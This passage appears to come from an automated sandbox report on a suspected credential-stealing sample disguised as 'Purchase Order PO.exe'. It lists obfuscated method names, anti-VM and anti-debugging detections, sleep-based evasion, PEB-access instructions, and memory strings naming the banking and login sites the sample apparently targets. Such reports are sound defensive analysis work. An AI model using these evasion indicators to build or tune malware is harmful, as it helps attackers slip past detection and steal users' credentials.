                      Source: 0.2.Purchase Order PO.exe.91a0000.8.raw.unpack, n51bqfhhcdaFKIjyDe.csHigh entropy of concatenated method names: 'jX9PJk5eRN', 'YdfP6MBjvl', 'z9BP7TG5f1', 'BPoPajn5Nf', 'h2qPgm15BG', 'Wp8P9ymbWA', 'OLBP0fH4CX', 'K4QPhxhrpD', 'j2xPFM7LQH', 'rpxP8QhCey'
                      Source: 0.2.Purchase Order PO.exe.91a0000.8.raw.unpack, mspVaMRVfasIrgTCCJ.csHigh entropy of concatenated method names: 'C19uaDIciZ', 'VVQug4GhoW', 'p0Vu9nJY0Q', 'BTtu0kSF0L', 'HlausCv5RQ', 'F4Tuh5WHhT', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.Purchase Order PO.exe.91a0000.8.raw.unpack, Qq9mFUXDUKZxa3t4LW.csHigh entropy of concatenated method names: 'ei5T1NShIE', 'fBlTR6IRpE', 'BCFe4j2bdl', 'QkXebENW91', 'YJCT3CUCIJ', 'vkTT2so0VB', 'iAoTtwZDu2', 'nLUTdXsbqL', 'yoYTDxZ05c', 'eWuTQj9hgT'
                      Source: 0.2.Purchase Order PO.exe.91a0000.8.raw.unpack, HVaY5fj05oNEYQ5bkR.csHigh entropy of concatenated method names: 'g8t7dL7VGL', 'Mrx7DWexLS', 'Uv17QoengP', 'TmT7SUAfh8', 'VnE7qUSQn6', 'YFu7X0LiDg', 'vEl7MJbeQm', 'wS271ua6bN', 'NhW7UNVJ94', 'nPG7RYGnL8'
                      Source: 0.2.Purchase Order PO.exe.91a0000.8.raw.unpack, GriiCsnN2mKnYudkrE.csHigh entropy of concatenated method names: 'RCrfnbsZu', 'h4oHiXR0C', 'Nso5sOrGS', 'l6ZoIlQRI', 'DV4i4Al83', 'wuKA1kxEb', 'KZ6PB6yh6ydqYjvXk9', 'ty4bNqCEhWDAuoHln5', 'wQHeMHnRp', 'A9IugkvpE'
                      Source: 0.2.Purchase Order PO.exe.91a0000.8.raw.unpack, TKI3ACdCVd5R3xuR1O.csHigh entropy of concatenated method names: 'u5aOyICt1q', 'e1AO2pqUEW', 'GB7OdVc6uT', 'qEIODn4m3e', 'UKkOc6ToEF', 'FOTOp7hNlA', 'o59OZH4E79', 'nNVOk2Nh2m', 'cnyOmrPeJd', 'AV5OEEF25k'
                      Source: 0.2.Purchase Order PO.exe.91a0000.8.raw.unpack, CXQiw3bb50nvFL58ii4.csHigh entropy of concatenated method names: 'lj5uRDxkCR', 'R40uzZ2ZMm', 'b8GI4E7P9S', 'j8aIbB6Jsj', 'VFdInX6yry', 'iTvIPSiJTE', 'rnkICf4qT4', 'W63IJyVreh', 'owDI6bQZRx', 'SiMI79lEng'
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: Purchase Order PO.exe PID: 4564, type: MEMORYSTR
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                      Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                      Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                      Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                      Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                      Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                      Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                      Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeMemory allocated: 2D80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeMemory allocated: 2F90000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeMemory allocated: 2DB0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeMemory allocated: 9330000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeMemory allocated: A330000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeMemory allocated: A540000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeMemory allocated: B540000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC096E rdtsc 3_2_00FC096E
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeWindow / User API: threadDelayed 9742Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeAPI coverage: 0.7 %
                      Source: C:\Windows\SysWOW64\isoburn.exeAPI coverage: 2.8 %
                      Source: C:\Users\user\Desktop\Purchase Order PO.exe TID: 2992Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exe TID: 7064Thread sleep count: 230 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exe TID: 7064Thread sleep time: -460000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exe TID: 7064Thread sleep count: 9742 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exe TID: 7064Thread sleep time: -19484000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\isoburn.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02EDC4E0 FindFirstFileW,FindNextFileW,FindClose,6_2_02EDC4E0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: l420377x.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                      Source: l420377x.6.drBinary or memory string: discord.comVMware20,11696428655f
                      Source: l420377x.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                      Source: l420377x.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                      Source: l420377x.6.drBinary or memory string: global block list test formVMware20,11696428655
                      Source: l420377x.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                      Source: GDDZlGeaCapsK.exe, 00000008.00000002.3283923075.00000000012AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
                      Source: l420377x.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                      Source: l420377x.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                      Source: l420377x.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                      Source: l420377x.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                      Source: l420377x.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                      Source: l420377x.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                      Source: l420377x.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                      Source: l420377x.6.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                      Source: l420377x.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                      Source: firefox.exe, 00000009.00000002.2729353726.000001FE2377C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: isoburn.exe, 00000006.00000002.3282862649.0000000003207000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\$x3
                      Source: l420377x.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                      Source: l420377x.6.drBinary or memory string: outlook.office.comVMware20,11696428655s
                      Source: l420377x.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                      Source: l420377x.6.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                      Source: l420377x.6.drBinary or memory string: AMC password management pageVMware20,11696428655
                      Source: l420377x.6.drBinary or memory string: tasks.office.comVMware20,11696428655o
                      Source: l420377x.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                      Source: l420377x.6.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                      Source: l420377x.6.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                      Source: l420377x.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                      Source: l420377x.6.drBinary or memory string: dev.azure.comVMware20,11696428655j
                      Source: l420377x.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                      Source: l420377x.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                      Source: l420377x.6.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                      Source: l420377x.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                      Source: l420377x.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC096E rdtsc 3_2_00FC096E
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00417723 LdrLoadDll,3_2_00417723
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F7C0F0 mov eax, dword ptr fs:[00000030h]3_2_00F7C0F0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC20F0 mov ecx, dword ptr fs:[00000030h]3_2_00FC20F0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0102E10E mov eax, dword ptr fs:[00000030h]3_2_0102E10E
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0102E10E mov ecx, dword ptr fs:[00000030h]3_2_0102E10E
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0102E10E mov eax, dword ptr fs:[00000030h]3_2_0102E10E
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0102E10E mov eax, dword ptr fs:[00000030h]3_2_0102E10E
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0102E10E mov ecx, dword ptr fs:[00000030h]3_2_0102E10E
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0102E10E mov eax, dword ptr fs:[00000030h]3_2_0102E10E
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0102E10E mov eax, dword ptr fs:[00000030h]3_2_0102E10E
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0102E10E mov ecx, dword ptr fs:[00000030h]3_2_0102E10E
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0102E10E mov eax, dword ptr fs:[00000030h]3_2_0102E10E
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0102E10E mov ecx, dword ptr fs:[00000030h]3_2_0102E10E
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01040115 mov eax, dword ptr fs:[00000030h]3_2_01040115
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F880E9 mov eax, dword ptr fs:[00000030h]3_2_00F880E9
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F7A0E3 mov ecx, dword ptr fs:[00000030h]3_2_00F7A0E3
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0102A118 mov ecx, dword ptr fs:[00000030h]3_2_0102A118
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0102A118 mov eax, dword ptr fs:[00000030h]3_2_0102A118
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0102A118 mov eax, dword ptr fs:[00000030h]3_2_0102A118
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0102A118 mov eax, dword ptr fs:[00000030h]3_2_0102A118
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01014144 mov eax, dword ptr fs:[00000030h]3_2_01014144
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01014144 mov eax, dword ptr fs:[00000030h]3_2_01014144
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01014144 mov ecx, dword ptr fs:[00000030h]3_2_01014144
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01014144 mov eax, dword ptr fs:[00000030h]3_2_01014144
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01014144 mov eax, dword ptr fs:[00000030h]3_2_01014144
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01018158 mov eax, dword ptr fs:[00000030h]3_2_01018158
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F8208A mov eax, dword ptr fs:[00000030h]3_2_00F8208A
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01024180 mov eax, dword ptr fs:[00000030h]3_2_01024180
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01024180 mov eax, dword ptr fs:[00000030h]3_2_01024180
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FAC073 mov eax, dword ptr fs:[00000030h]3_2_00FAC073
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0103C188 mov eax, dword ptr fs:[00000030h]3_2_0103C188
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0103C188 mov eax, dword ptr fs:[00000030h]3_2_0103C188
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0100019F mov eax, dword ptr fs:[00000030h]3_2_0100019F
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0100019F mov eax, dword ptr fs:[00000030h]3_2_0100019F
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0100019F mov eax, dword ptr fs:[00000030h]3_2_0100019F
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0100019F mov eax, dword ptr fs:[00000030h]3_2_0100019F
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F82050 mov eax, dword ptr fs:[00000030h]3_2_00F82050
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010461C3 mov eax, dword ptr fs:[00000030h]3_2_010461C3
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010461C3 mov eax, dword ptr fs:[00000030h]3_2_010461C3
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F7A020 mov eax, dword ptr fs:[00000030h]3_2_00F7A020
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F7C020 mov eax, dword ptr fs:[00000030h]3_2_00F7C020
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010561E5 mov eax, dword ptr fs:[00000030h]3_2_010561E5
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F9E016 mov eax, dword ptr fs:[00000030h]3_2_00F9E016
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F9E016 mov eax, dword ptr fs:[00000030h]3_2_00F9E016
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F9E016 mov eax, dword ptr fs:[00000030h]3_2_00F9E016
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F9E016 mov eax, dword ptr fs:[00000030h]3_2_00F9E016
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01004000 mov ecx, dword ptr fs:[00000030h]3_2_01004000
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01022000 mov eax, dword ptr fs:[00000030h]3_2_01022000
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01022000 mov eax, dword ptr fs:[00000030h]3_2_01022000
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01022000 mov eax, dword ptr fs:[00000030h]3_2_01022000
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01022000 mov eax, dword ptr fs:[00000030h]3_2_01022000
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01022000 mov eax, dword ptr fs:[00000030h]3_2_01022000
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01022000 mov eax, dword ptr fs:[00000030h]3_2_01022000
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01022000 mov eax, dword ptr fs:[00000030h]3_2_01022000
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01022000 mov eax, dword ptr fs:[00000030h]3_2_01022000
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FB01F8 mov eax, dword ptr fs:[00000030h]3_2_00FB01F8
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FFE1D0 mov eax, dword ptr fs:[00000030h]3_2_00FFE1D0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FFE1D0 mov eax, dword ptr fs:[00000030h]3_2_00FFE1D0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FFE1D0 mov ecx, dword ptr fs:[00000030h]3_2_00FFE1D0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FFE1D0 mov eax, dword ptr fs:[00000030h]3_2_00FFE1D0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FFE1D0 mov eax, dword ptr fs:[00000030h]3_2_00FFE1D0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01016030 mov eax, dword ptr fs:[00000030h]3_2_01016030
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01006050 mov eax, dword ptr fs:[00000030h]3_2_01006050
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F7A197 mov eax, dword ptr fs:[00000030h]3_2_00F7A197
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F7A197 mov eax, dword ptr fs:[00000030h]3_2_00F7A197
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F7A197 mov eax, dword ptr fs:[00000030h]3_2_00F7A197
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC0185 mov eax, dword ptr fs:[00000030h]3_2_00FC0185
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F7C156 mov eax, dword ptr fs:[00000030h]3_2_00F7C156
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010180A8 mov eax, dword ptr fs:[00000030h]3_2_010180A8
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F86154 mov eax, dword ptr fs:[00000030h]3_2_00F86154
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F86154 mov eax, dword ptr fs:[00000030h]3_2_00F86154
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010460B8 mov eax, dword ptr fs:[00000030h]3_2_010460B8
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010460B8 mov ecx, dword ptr fs:[00000030h]3_2_010460B8
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010020DE mov eax, dword ptr fs:[00000030h]3_2_010020DE
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FB0124 mov eax, dword ptr fs:[00000030h]3_2_00FB0124
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010060E0 mov eax, dword ptr fs:[00000030h]3_2_010060E0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F902E1 mov eax, dword ptr fs:[00000030h]3_2_00F902E1
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F902E1 mov eax, dword ptr fs:[00000030h]3_2_00F902E1
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F902E1 mov eax, dword ptr fs:[00000030h]3_2_00F902E1
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F8A2C3 mov eax, dword ptr fs:[00000030h]3_2_00F8A2C3
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F8A2C3 mov eax, dword ptr fs:[00000030h]3_2_00F8A2C3
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F8A2C3 mov eax, dword ptr fs:[00000030h]3_2_00F8A2C3
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F8A2C3 mov eax, dword ptr fs:[00000030h]3_2_00F8A2C3
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F8A2C3 mov eax, dword ptr fs:[00000030h]3_2_00F8A2C3
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01002349 mov eax, dword ptr fs:[00000030h]3_2_01002349
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01002349 mov eax, dword ptr fs:[00000030h]3_2_01002349
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01002349 mov eax, dword ptr fs:[00000030h]3_2_01002349
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01002349 mov eax, dword ptr fs:[00000030h]3_2_01002349
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01002349 mov eax, dword ptr fs:[00000030h]3_2_01002349
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01002349 mov eax, dword ptr fs:[00000030h]3_2_01002349
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01002349 mov eax, dword ptr fs:[00000030h]3_2_01002349
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01002349 mov eax, dword ptr fs:[00000030h]3_2_01002349
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01002349 mov eax, dword ptr fs:[00000030h]3_2_01002349
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01002349 mov eax, dword ptr fs:[00000030h]3_2_01002349
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01002349 mov eax, dword ptr fs:[00000030h]3_2_01002349
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01002349 mov eax, dword ptr fs:[00000030h]3_2_01002349
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01002349 mov eax, dword ptr fs:[00000030h]3_2_01002349
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01002349 mov eax, dword ptr fs:[00000030h]3_2_01002349
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01002349 mov eax, dword ptr fs:[00000030h]3_2_01002349
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01028350 mov ecx, dword ptr fs:[00000030h]3_2_01028350
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0104A352 mov eax, dword ptr fs:[00000030h]3_2_0104A352
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F902A0 mov eax, dword ptr fs:[00000030h]3_2_00F902A0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F902A0 mov eax, dword ptr fs:[00000030h]3_2_00F902A0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0100035C mov eax, dword ptr fs:[00000030h]3_2_0100035C
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0100035C mov eax, dword ptr fs:[00000030h]3_2_0100035C
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0100035C mov eax, dword ptr fs:[00000030h]3_2_0100035C
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0100035C mov ecx, dword ptr fs:[00000030h]3_2_0100035C
